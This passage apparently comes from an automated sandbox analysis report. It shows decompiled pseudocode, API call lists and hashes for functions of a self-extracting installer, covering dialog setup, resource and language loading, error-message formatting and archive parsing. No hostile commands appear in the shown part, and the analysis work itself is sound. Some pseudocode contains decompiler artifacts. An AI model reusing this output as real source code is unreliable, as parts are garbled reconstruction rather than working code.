                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403DB4
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403DD2
                                          • SetLastError.KERNEL32(?), ref: 00403DDB
                                          • lstrlenA.KERNEL32(0041E930), ref: 00403E11
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00403E2C
                                          • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403E5E
                                          • _wtol.MSVCRT(?), ref: 00403E6F
                                          • MultiByteToWideChar.KERNEL32(00000000,0041E930,00000001,00000000,00000002), ref: 00403E8F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                          • String ID: SfxString%d$X!B
                                          • API String ID: 2117570002-850189017
                                          • Opcode ID: 6c90256099afbc114151a8a56de0fb82012744aac624a816c561cb5194af7896
                                          • Instruction ID: 68e66196db71daaa07867c957ec585132196606c956435e67b7422de32b8828f
                                          • Opcode Fuzzy Hash: 6c90256099afbc114151a8a56de0fb82012744aac624a816c561cb5194af7896
                                          • Instruction Fuzzy Hash: 71519171A00205BFDB20DF64DE45DAB7BBCEF44741F50453AE206E6290EBB4AE61CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409332, Relevance: 28.6, APIs: 19, Instructions: 149windowcomtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E00409332(void* __edx, void* __eflags) {
				int _v4;
				char _v8;
				void* __ecx;
				intOrPtr _t30;
				intOrPtr* _t33;
				signed int _t44;
				struct HMENU__* _t49;
				signed int _t53;
				intOrPtr _t62;
				void* _t71;
				intOrPtr _t74;
				signed int _t83;

				_t71 = __edx;
				_t74 = _t62;
				 *0x4228c4 =  *(_t74 + 4);
				 *0x4228c8 = _t74;
				E004079B7(_t62, 0x4b8, 1);
				SendMessageW(GetDlgItem( *(_t74 + 4), 0x4b8), 0x401, 0, 0x75300000);
				_t30 =  *0x422750; // 0x0
				if(_t30 != 0) {
					E00407DB7(_t74, _t71, 0x4b4, _t30);
					E0040790B(GetDlgItem( *(_t74 + 4), 0x4b4),  *0x422750);
				}
				if(( *0x42245c & 0x00000004) != 0) {
					E004079B7(_t74, 0x4b5, 1);
					_t53 = GetWindowLongW(GetDlgItem( *(_t74 + 4), 0x4b5), 0xfffffff0);
					SetWindowLongW(GetDlgItem( *(_t74 + 4), 0x4b5), 0xfffffff0, _t53 | 0x00000001);
					E00408183(_t74);
				}
				if( *0x422770 == 1) {
					E004079B7(_t74, 0x4b4, 0);
					_t49 = GetSystemMenu( *(_t74 + 4), 0);
					if(_t49 != 0) {
						EnableMenuItem(_t49, 0xf060, 1);
					}
				}
				SetFocus(GetDlgItem( *(_t74 + 4), 0x4b4));
				_t83 =  *0x4228d4; // 0x0
				if(_t83 != 0) {
					 *((intOrPtr*)(_t74 + 0x68)) = 0;
					 *((intOrPtr*)(_t74 + 0x6c)) = 0;
					 *((intOrPtr*)(_t74 + 0x60)) = 0x64;
					 *((intOrPtr*)(_t74 + 0x64)) = 0;
					_t44 =  *0x4228d4; // 0x0
					SetTimer( *(_t74 + 4), 1, _t44 * 0xa, 0);
				}
				_t33 = _t74 + 0x70;
				 *_t33 = 0;
				if(( *0x42245c & 0x00002000) == 0) {
					__imp__CoCreateInstance(0x41fa54, 0, 1, 0x41efe4, _t33);
					if(_t33 == 0) {
						E0040816A(_t74, 1);
					}
				}
				if( *0x422770 == 1 && IsWindow(GetDlgItem( *(_t74 + 4), 2)) != 0) {
					EnableWindow(GetDlgItem( *(_t74 + 4), 2), 0);
				}
				_t89 =  *0x42245c & 0x00000004;
				if(( *0x42245c & 0x00000004) == 0) {
					ShowWindow(GetDlgItem( *(_t74 + 4), 0x4b5), 0);
				}
				_v8 = 0;
				_v4 = 0;
				E0040885E(_t74, _t71, _t89,  &_v8);
				return E00408E57(_t71);
			}















                                          0x00409332
                                          0x00409338
                                          0x00409345
                                          0x0040934a
                                          0x00409350
                                          0x0040936e
                                          0x00409374
                                          0x00409380
                                          0x00409386
                                          0x0040939a
                                          0x0040939a
                                          0x004093ab
                                          0x004093b2
                                          0x004093c0
                                          0x004093d3
                                          0x004093db
                                          0x004093db
                                          0x004093e7
                                          0x004093ee
                                          0x004093f9
                                          0x00409401
                                          0x0040940b
                                          0x0040940b
                                          0x00409401
                                          0x00409418
                                          0x00409420
                                          0x00409426
                                          0x00409428
                                          0x0040942b
                                          0x0040942e
                                          0x00409435
                                          0x00409438
                                          0x00409447
                                          0x00409447
                                          0x0040944d
                                          0x00409450
                                          0x0040945c
                                          0x0040946c
                                          0x00409474
                                          0x0040947a
                                          0x0040947a
                                          0x00409474
                                          0x00409486
                                          0x004094a3
                                          0x004094a3
                                          0x004094a9
                                          0x004094b0
                                          0x004094ba
                                          0x004094ba
                                          0x004094c7
                                          0x004094cb
                                          0x004094cf
                                          0x004094e1

                                          APIs
                                            • Part of subcall function 004079B7: GetDlgItem.USER32 ref: 004079C4
                                            • Part of subcall function 004079B7: ShowWindow.USER32(00000000,?), ref: 004079DB
                                          • GetDlgItem.USER32 ref: 0040935F
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040936E
                                          • GetDlgItem.USER32 ref: 00409395
                                            • Part of subcall function 0040790B: SetWindowTextW.USER32(00000000,00000000), ref: 00407913
                                            • Part of subcall function 0040885E: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00408896
                                            • Part of subcall function 0040885E: GetDlgItem.USER32 ref: 004088BA
                                            • Part of subcall function 0040885E: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004088C7
                                            • Part of subcall function 0040885E: wsprintfW.USER32 ref: 004088E7
                                            • Part of subcall function 0040885E: GetDlgItem.USER32 ref: 00408905
                                            • Part of subcall function 0040885E: ??3@YAXPAX@Z.MSVCRT ref: 00408993
                                            • Part of subcall function 00408E57: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409247), ref: 00408E81
                                            • Part of subcall function 00408E57: LoadIconW.USER32(00000000), ref: 00408E84
                                            • Part of subcall function 00408E57: GetSystemMetrics.USER32 ref: 00408E98
                                            • Part of subcall function 00408E57: GetSystemMetrics.USER32 ref: 00408E9D
                                            • Part of subcall function 00408E57: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409247), ref: 00408EA6
                                            • Part of subcall function 00408E57: LoadImageW.USER32 ref: 00408EA9
                                            • Part of subcall function 00408E57: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EC9
                                            • Part of subcall function 00408E57: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408ED2
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408EEF
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408EF9
                                            • Part of subcall function 00408E57: GetWindowLongW.USER32(?,000000F0), ref: 00408F05
                                            • Part of subcall function 00408E57: SetWindowLongW.USER32 ref: 00408F14
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F22
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F30
                                            • Part of subcall function 00408E57: GetWindowLongW.USER32(000000F0,000000F0), ref: 00408F3C
                                            • Part of subcall function 00408E57: SetWindowLongW.USER32 ref: 00408F4B
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F58
                                          • GetDlgItem.USER32 ref: 004093BB
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 004093C0
                                          • GetDlgItem.USER32 ref: 004093D0
                                          • SetWindowLongW.USER32 ref: 004093D3
                                          • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004093F9
                                          • EnableMenuItem.USER32 ref: 0040940B
                                          • GetDlgItem.USER32 ref: 00409415
                                          • SetFocus.USER32(00000000), ref: 00409418
                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00409447
                                          • CoCreateInstance.OLE32(0041FA54,00000000,00000001,0041EFE4,?), ref: 0040946C
                                          • GetDlgItem.USER32 ref: 0040948D
                                          • IsWindow.USER32(00000000), ref: 00409490
                                          • GetDlgItem.USER32 ref: 004094A0
                                          • EnableWindow.USER32(00000000), ref: 004094A3
                                          • GetDlgItem.USER32 ref: 004094B7
                                          • ShowWindow.USER32(00000000), ref: 004094BA
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Item$Window$Long$MessageSend$System$EnableHandleLoadMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTextTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                          • String ID:
                                          • API String ID: 957878288-0
                                          • Opcode ID: e2f02459deb40e79b423d59a5e6600ce65444f24f98bf66ec9fc20f3b27b8bdb
                                          • Instruction ID: 82f3168065e5e37885ea10ad8f323bea47048e436c2f5ba3df634f29c1837039
                                          • Opcode Fuzzy Hash: e2f02459deb40e79b423d59a5e6600ce65444f24f98bf66ec9fc20f3b27b8bdb
                                          • Instruction Fuzzy Hash: E14155B0604709BBDA206B21DD49F5B7B9DEB84B04F40453EF555A62E1CB79AC01CB2D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403908, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 82libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E00403908(CHAR* __ecx, CHAR* __edx, intOrPtr* _a4) {
				struct HINSTANCE__* _v8;
				CHAR* _v12;
				CHAR* _v16;
				short _v80;
				struct HINSTANCE__* _t14;
				void* _t16;
				struct HRSRC__* _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr* _t35;

				_v12 = __edx;
				_v16 = __ecx;
				_t14 = GetModuleHandleW(0);
				_v8 = _t14;
				_t28 = FindResourceExA(_t14, _v16, _v12,  *0x422730 & 0x0000ffff);
				if(_t28 != 0) {
					L2:
					_t35 = _a4;
					if(_t35 != 0) {
						 *_t35 = SizeofResource(_v8, _t28);
					}
					_t16 = LoadResource(_v8, _t28);
					if(_t16 == 0) {
						L6:
						if( *0x422734 != 0) {
							L10:
							return 0;
						}
						 *0x422734 = 1;
						_t29 = GetProcAddress( *0x42275c, "SetProcessPreferredUILanguages");
						wsprintfW( &_v80, L"%04X%c%04X%c",  *0x422730 & 0x0000ffff, 0, 0x409, 0);
						if(_t29 != 0) {
							L9:
							 *_t29(4,  &_v80, 0);
							goto L10;
						}
						_t29 = GetProcAddress( *0x42275c, "SetThreadPreferredUILanguages");
						if(_t29 == 0) {
							goto L10;
						}
						goto L9;
					} else {
						return LockResource(_t16);
					}
				}
				_t28 = FindResourceExA(_v8, _v16, _v12, 0x409);
				if(_t28 == 0) {
					goto L6;
				}
				goto L2;
			}












                                          0x00403913
                                          0x00403916
                                          0x00403919
                                          0x00403930
                                          0x00403939
                                          0x00403942
                                          0x00403956
                                          0x00403956
                                          0x0040395b
                                          0x00403967
                                          0x00403967
                                          0x0040396d
                                          0x00403975
                                          0x00403980
                                          0x00403987
                                          0x004039e8
                                          0x00000000
                                          0x004039e8
                                          0x0040399a
                                          0x004039a8
                                          0x004039be
                                          0x004039c9
                                          0x004039de
                                          0x004039e6
                                          0x00000000
                                          0x004039e6
                                          0x004039d8
                                          0x004039dc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403977
                                          0x00000000
                                          0x00403978
                                          0x00403975
                                          0x00403950
                                          0x00403954
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403919
                                          • FindResourceExA.KERNEL32(00000000,?,?), ref: 00403937
                                          • FindResourceExA.KERNEL32(?,?,?,00000409), ref: 0040394E
                                          • SizeofResource.KERNEL32(?,00000000), ref: 00403961
                                          • LoadResource.KERNEL32(?,00000000), ref: 0040396D
                                          • LockResource.KERNEL32(00000000), ref: 00403978
                                          • GetProcAddress.KERNEL32(SetProcessPreferredUILanguages), ref: 004039A4
                                          • wsprintfW.USER32 ref: 004039BE
                                          • GetProcAddress.KERNEL32(SetThreadPreferredUILanguages), ref: 004039D6
                                          Strings
                                          • %04X%c%04X%c, xrefs: 004039B8
                                          • SetProcessPreferredUILanguages, xrefs: 0040398F
                                          • SetThreadPreferredUILanguages, xrefs: 004039CB
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Resource$AddressFindProc$HandleLoadLockModuleSizeofwsprintf
                                          • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages
                                          • API String ID: 2090077119-3413765421
                                          • Opcode ID: 9ff9c65ee6ad474d1f94e696075432f17a425964b421737aef398b4ac16ad6db
                                          • Instruction ID: fb6bf53818f6b5e578f497660123dac7438a07a30edb6be36b630e0bf9700e61
                                          • Opcode Fuzzy Hash: 9ff9c65ee6ad474d1f94e696075432f17a425964b421737aef398b4ac16ad6db
                                          • Instruction Fuzzy Hash: 68212FB1E00215BBDB105FA59D45B9FBFBCEB48701F104076EA00B22A0D7F59D51DB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409684, Relevance: 16.6, APIs: 11, Instructions: 94stringwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E00409684(void* __edx, short _a4, WCHAR* _a8, char _a12) {
				char* _v8;
				long _v12;
				short _v2060;
				WCHAR* _t28;
				long _t32;
				int _t36;
				WCHAR* _t38;
				WCHAR* _t41;
				WCHAR* _t50;
				char* _t52;
				short _t62;
				void* _t65;
				signed int _t66;
				signed int _t69;
				long _t75;

				_t65 = __edx;
				_t28 = E00403CE0(_a8);
				_t52 =  &_a12;
				_v8 = _t52;
				wvsprintfW( &_v2060, _t28, _t52);
				if(_a4 == 0) {
					L4:
					return E0040959E( &_v2060, _t65);
				}
				_t32 = GetLastError();
				_v12 = _t32;
				if(FormatMessageW(0x1100, 0, _t32,  *0x422730 & 0x0000ffff,  &_a4, 0,  &_v8) != 0) {
					L3:
					_t69 = lstrlenW( &_v2060);
					_t36 = lstrlenW(_a4);
					_t37 = _t36 + _t69 + 2;
					_t66 = 2;
					_t38 = (_t36 + _t69 + 2) * _t66;
					_push( ~(0 | _t75 > 0x00000000) | _t38);
					L0041C16C();
					_t50 = _t38;
					lstrcpyW(_t50,  &_v2060);
					_t62 = 0xa;
					_t41 =  &(_t50[_t69]);
					 *_t41 = _t62;
					lstrcpyW( &(_t41[1]), _a4);
					E0040959E(_t50, _t37 * _t66 >> 0x20);
					_push(_t50);
					L0041C160();
					return LocalFree(_a4);
				}
				_t75 = FormatMessageW(0x1100, 0, _v12, 0,  &_a4, 0,  &_v8);
				if(_t75 == 0) {
					goto L4;
				}
				goto L3;
			}


















                                          0x00409684
                                          0x00409693
                                          0x00409698
                                          0x004096a4
                                          0x004096a7
                                          0x004096b2
                                          0x00409767
                                          0x00000000
                                          0x0040976d
                                          0x004096b8
                                          0x004096dd
                                          0x004096e4
                                          0x004096fb
                                          0x0040970d
                                          0x0040970f
                                          0x00409715
                                          0x00409719
                                          0x0040971a
                                          0x00409723
                                          0x00409724
                                          0x0040972f
                                          0x0040973a
                                          0x0040973e
                                          0x0040973f
                                          0x00409742
                                          0x0040974c
                                          0x00409750
                                          0x00409755
                                          0x00409756
                                          0x00000000
                                          0x0040975f
                                          0x004096f7
                                          0x004096f9
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • wvsprintfW.USER32(?,00000000,?), ref: 004096A7
                                          • GetLastError.KERNEL32 ref: 004096B8
                                          • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,009D2650), ref: 004096E0
                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,009D2650), ref: 004096F5
                                          • lstrlenW.KERNEL32(?), ref: 00409708
                                          • lstrlenW.KERNEL32(?), ref: 0040970F
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409724
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0040973A
                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 0040974C
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409756
                                          • LocalFree.KERNEL32(?), ref: 0040975F
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                          • String ID:
                                          • API String ID: 829399097-0
                                          • Opcode ID: 1047e70116df1bae1a142c8575aecfcd7dfd1e2c76c593a4b258010fb7882ad5
                                          • Instruction ID: f2b022f15dd7bd7e525fcf8277322542a79ac5a2d24a0c8bc30a78414b9bc94a
                                          • Opcode Fuzzy Hash: 1047e70116df1bae1a142c8575aecfcd7dfd1e2c76c593a4b258010fb7882ad5
                                          • Instruction Fuzzy Hash: 95216FB6900218FFDB14DFA1DC85DEA7BBCEB08344F00807AF50697191EA749E858BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A836, Relevance: 11.0, APIs: 7, Instructions: 450COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E0041A836(signed int __ecx, signed int __edx, signed int _a4, char _a8, short _a12, signed int _a16, intOrPtr _a20, char _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, void* _a48, signed int _a52, signed int _a56, signed int _a60, signed int _a64, signed int _a68, signed int _a72, signed int _a76, signed int _a80, intOrPtr _a84, signed int _a88, signed int _a92, signed int _a96, void* _a100, signed int _a108, signed int _a112, unsigned int _a116, signed int _a120, signed int _a124) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v104;
				char _v117;
				void* _v176;
				void* __ebx;
				signed int __edi;
				char* __esi;
				void* __ebp;
				void* _t374;
				signed int _t377;
				signed int _t387;
				intOrPtr* _t391;
				signed int _t395;
				signed int _t396;
				signed int _t407;
				intOrPtr* _t410;
				signed int _t411;
				signed int _t412;
				void* _t413;
				void* _t415;
				signed int _t419;
				void* _t423;
				signed int _t426;
				signed int _t438;
				void* _t456;
				signed int _t458;
				signed int _t459;
				signed int _t460;
				intOrPtr* _t461;
				signed int _t462;
				signed int _t465;
				signed int _t467;
				signed int _t479;
				signed int _t486;
				void* _t489;
				signed int _t490;
				intOrPtr _t501;
				unsigned int _t503;
				void* _t505;
				void* _t506;
				signed int _t513;
				void* _t521;
				signed int _t556;
				void* _t571;
				signed int _t572;
				signed int _t573;
				signed int _t575;
				signed int _t579;
				signed int _t582;
				signed int _t584;
				intOrPtr _t585;
				signed int _t587;
				intOrPtr* _t589;
				intOrPtr* _t590;
				signed int _t592;
				signed int _t594;
				intOrPtr* _t598;
				signed int _t599;
				void* _t602;
				void* _t603;

				_t570 = __edx;
				_t599 =  &_v104;
				_t603 = _t602 - 0x90;
				_t592 = __ecx;
				_t374 = E00418FB1( *((intOrPtr*)(__ecx + 0x38)));
				_t486 = _a108;
				if(_t374 != 2) {
					_t582 = 0;
					__eflags = 0;
				} else {
					_t582 = 0;
					_t609 = __edx;
					if(__edx == 0) {
						E004197F9(__ecx, __edx, _t609, _t486 + 0xe0);
						_t374 = E00418FB1( *((intOrPtr*)(_t592 + 0x38)));
					}
				}
				_a72 = _t582;
				_a76 = _t582;
				_a80 = _t582;
				if(_t374 != 3) {
					L9:
					_a36 = _t582;
					_a40 = _t582;
					_a44 = _t582;
					_v44 = _t582;
					_v40 = _t582;
					_v36 = _t582;
					_v32 = _t582;
					_v28 = _t582;
					_v24 = _t582;
					__eflags = _t374 - 4;
					if(_t374 == 4) {
						__eflags = _t570 - _t582;
						if(__eflags == 0) {
							_t589 = _t486 + 0xf8;
							E0041A533(_t486, _t592, _t570, _t592, __eflags,  &_a72, _t589, _t486,  &_a36,  &_v44);
							 *_t589 =  *_t589 +  *((intOrPtr*)(_t486 + 0xf0));
							asm("adc [edi+0x4], eax");
							_t374 = E00418FB1( *((intOrPtr*)(_t592 + 0x38)));
							_t582 = 0;
							__eflags = 0;
						}
					}
					 *(_t486 + 0x5c) = _t582;
					__eflags = _t374 - 5;
					if(__eflags != 0) {
						L85:
						E00419590(_t486, _t486, _t570, __eflags);
						_push(_v32);
						L0041C160();
						_push(_v44);
						L0041C160();
						_push(_a36);
						L0041C160();
						E0041969C( &_a72);
						_t377 = 0;
						__eflags = 0;
						goto L86;
					} else {
						__eflags = _t570 - _t582;
						if(__eflags == 0) {
							_a108 = E00418FE5( *((intOrPtr*)(_t592 + 0x38)), _t570, _t592, __eflags);
							E00419233(_t486 + 0x58, _t378);
							 *(_t486 + 0x5c) = _a108;
							E00419652(_t486 + 0x108, _t570, 9, _t582);
							E00419652(_t486 + 0x108, _t570, 6, _t582);
							__eflags = _a108 - _t582;
							if(__eflags > 0) {
								__eflags = _v40 - _t582;
								if(__eflags != 0) {
									E00419652(_t486 + 0x108, _t570, 0xa, _t582);
								}
							}
							_t584 = _a108;
							_a60 = 0;
							_a64 = 0;
							_a68 = 0;
							E00419725( &_a60, _t584, __eflags);
							_a24 = 0;
							_a28 = 0;
							_a32 = 0;
							_a48 = 0;
							_a52 = 0;
							_a56 = 0;
							_a124 = 0;
							while(1) {
								L67:
								_t387 = E00418FB1( *((intOrPtr*)(_t592 + 0x38)));
								_t501 =  *((intOrPtr*)(_t592 + 0x38));
								_a92 = _t387;
								__eflags = _t387 | _t570;
								_a96 = _t570;
								if((_t387 | _t570) == 0) {
									break;
								}
								_a84 = E00418FB1(_t501);
								_t390 =  *((intOrPtr*)(_t592 + 0x38));
								_t503 =  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 8));
								_a88 = _t570;
								_t570 = 0;
								__eflags = _a88;
								if(__eflags > 0) {
									L87:
									_t391 = E00418DE4(_t503, _t584);
									asm("cdq");
									asm("stosd");
									asm("stosd");
									_t505 = _t503 + 2;
									_t571 = _t570 + _t505;
									asm("stosd");
									_t506 = _t505 + 1;
									 *((intOrPtr*)(_t571 + 0x41 + _t599 * 4)) =  *((intOrPtr*)(_t571 + 0x41 + _t599 * 4)) + _t391;
									 *0x120041ac =  *0x120041ac + _t506;
									asm("lodsb");
									 *_t584 =  *_t584 + _t571;
									asm("lodsb");
									 *_t391 =  *_t391 + _t391;
									asm("stosd");
									 *((intOrPtr*)(_t592 - 0x54)) =  *((intOrPtr*)(_t592 - 0x54)) + _t571;
									 *((intOrPtr*)(_t592 - 0x54)) =  *((intOrPtr*)(_t592 - 0x54)) + _t571;
									_t489 = _t486 + _t486 + _t571;
									asm("stosd");
									 *_t584 =  *_t584 + _t489;
									asm("lodsb");
									_t513 = _t506 + 7;
									_t268 =  &_v117;
									 *_t268 = _v117 + _t571;
									__eflags =  *_t268;
									_push(_t599);
									_push(_t489);
									_push(_t592);
									_push(_t584);
									_t585 =  *((intOrPtr*)(_t603 + 8));
									_t594 = _t513;
									E00418567(_t585);
									 *((intOrPtr*)(_t585 + 0xe8)) =  *((intOrPtr*)(_t594 + 0x40));
									 *((intOrPtr*)(_t585 + 0xec)) =  *((intOrPtr*)(_t594 + 0x44));
									 *(_t585 + 0xe0) =  *((intOrPtr*)(_t594 + 0x56));
									_t490 = 0;
									 *((char*)(_t585 + 0xe1)) =  *((intOrPtr*)(_t594 + 0x57));
									__eflags =  *(_t585 + 0xe0);
									if( *(_t585 + 0xe0) != 0) {
										L104:
										_t395 = 0;
										__eflags = 0;
										goto L105;
									} else {
										_t572 =  *(_t594 + 0x5c);
										_v20 =  *((intOrPtr*)(_t594 + 0x60));
										_v12 =  *((intOrPtr*)(_t594 + 0x64));
										_v8 =  *((intOrPtr*)(_t594 + 0x68));
										_a4 =  *((intOrPtr*)(_t594 + 0x6c));
										asm("adc ecx, ebx");
										_v24 = _t572;
										 *((intOrPtr*)(_t585 + 0xf0)) =  *((intOrPtr*)(_t594 + 0x40)) + 0x20;
										 *((intOrPtr*)(_t585 + 0xf4)) =  *((intOrPtr*)(_t594 + 0x44));
										 *((intOrPtr*)(_t585 + 0x128)) = 0x20;
										 *((intOrPtr*)(_t585 + 0x12c)) = 0;
										 *((char*)(_t585 + 0x130)) = 0;
										__eflags = _v20;
										if(__eflags < 0) {
											goto L104;
										} else {
											if(__eflags > 0) {
												L92:
												__eflags = _v8 - 0x40000000;
												if(__eflags > 0) {
													goto L104;
												} else {
													if(__eflags < 0) {
														L95:
														_t395 = _v12 | _v8;
														__eflags = _t395;
														if(_t395 != 0) {
															__eflags =  *((intOrPtr*)(_t585 + 0x134)) - _t490;
															if( *((intOrPtr*)(_t585 + 0x134)) == _t490) {
																 *((char*)(_t585 + 0x130)) = 1;
															}
															asm("adc ecx, ebx");
															 *((intOrPtr*)(_t594 + 0x70)) =  *((intOrPtr*)(_t594 + 0x70)) + _v12 + 0x20;
															asm("adc [esi+0x74], ecx");
															_t407 = _v12 + _t572;
															_t573 = _v8;
															asm("adc edx, [ebp-0x10]");
															_v32 = _t407;
															asm("adc ecx, ebx");
															 *((intOrPtr*)(_t585 + 0x128)) = _t407 + 0x20;
															 *((intOrPtr*)(_t585 + 0x12c)) = _t573;
															_t521 =  *((intOrPtr*)(_t594 + 0x48)) -  *((intOrPtr*)(_t585 + 0xf0));
															asm("sbb eax, [edi+0xf4]");
															__eflags =  *((intOrPtr*)(_t594 + 0x4c)) - _t573;
															if(__eflags > 0) {
																L107:
																_t410 =  *_t594;
																_t396 =  *((intOrPtr*)( *_t410 + 0x10))(_t410, _v24, _v20, 1, _t490);
																__eflags = _t396 - _t490;
																if(_t396 == _t490) {
																	_t411 = _v12;
																	__eflags = _t411 - _t411;
																	if(_t411 != _t411) {
																		L110:
																		_t396 = 0x8007000e;
																	} else {
																		__eflags = _t490 - _v8;
																		if(_t490 == _v8) {
																			_push(_v12);
																			L0041C16C();
																			_v32 = _t411;
																			_t412 = E0041670E(_v12); // executed
																			__eflags = _t412 - _t490;
																			if(_t412 == _t490) {
																				_t575 = _v12;
																				_t525 = _v32;
																				_t413 = E0041BCE0(_v32, _t575);
																				__eflags = _t413 - _a4;
																				if(_t413 != _a4) {
																					L115:
																					E00418DE4(_t525, _t585);
																				}
																				__eflags =  *((intOrPtr*)(_t585 + 0x134)) - _t490;
																				if( *((intOrPtr*)(_t585 + 0x134)) == _t490) {
																					 *((char*)(_t585 + 0x131)) = 1;
																				}
																				_push(_t490);
																				_v20 = _t490;
																				E004192D4( &_v24, _t594, _v32, _v12);
																				_t525 =  *((intOrPtr*)(_t594 + 0x38));
																				_v16 = _t490;
																				_v12 = _t490;
																				_v8 = _t490;
																				_t415 = E00418FB1( *((intOrPtr*)(_t594 + 0x38)));
																				__eflags = _t415 - 1;
																				if(_t415 != 1) {
																					L120:
																					__eflags = _t415 - 0x17;
																					if(_t415 != 0x17) {
																						goto L115;
																					} else {
																						__eflags = _t575 - _t490;
																						if(__eflags != 0) {
																							goto L115;
																						} else {
																							_push(_a20);
																							_push(_a16);
																							_t525 = _t594;
																							_push(_a12);
																							_t419 = E0041A63E(_t594, _t575, __eflags,  *((intOrPtr*)(_t585 + 0xf0)),  *((intOrPtr*)(_t585 + 0xf4)), _t585 + 0x100,  &_v16, _a8);
																							_a4 = _t419;
																							__eflags = _t419 - _t490;
																							if(_t419 == _t490) {
																								__eflags = _v12 - _t490;
																								if(_v12 != _t490) {
																									__eflags = _v12 - 1;
																									if(_v12 > 1) {
																										goto L115;
																									} else {
																										E00418E1D( &_v24);
																										E004192FE(_t594,  *_v16);
																										_t525 =  *((intOrPtr*)(_t594 + 0x38));
																										_t423 = E00418FB1( *((intOrPtr*)(_t594 + 0x38)));
																										__eflags = _t423 - 1;
																										if(_t423 != 1) {
																											goto L115;
																										} else {
																											__eflags = _t575 - _t490;
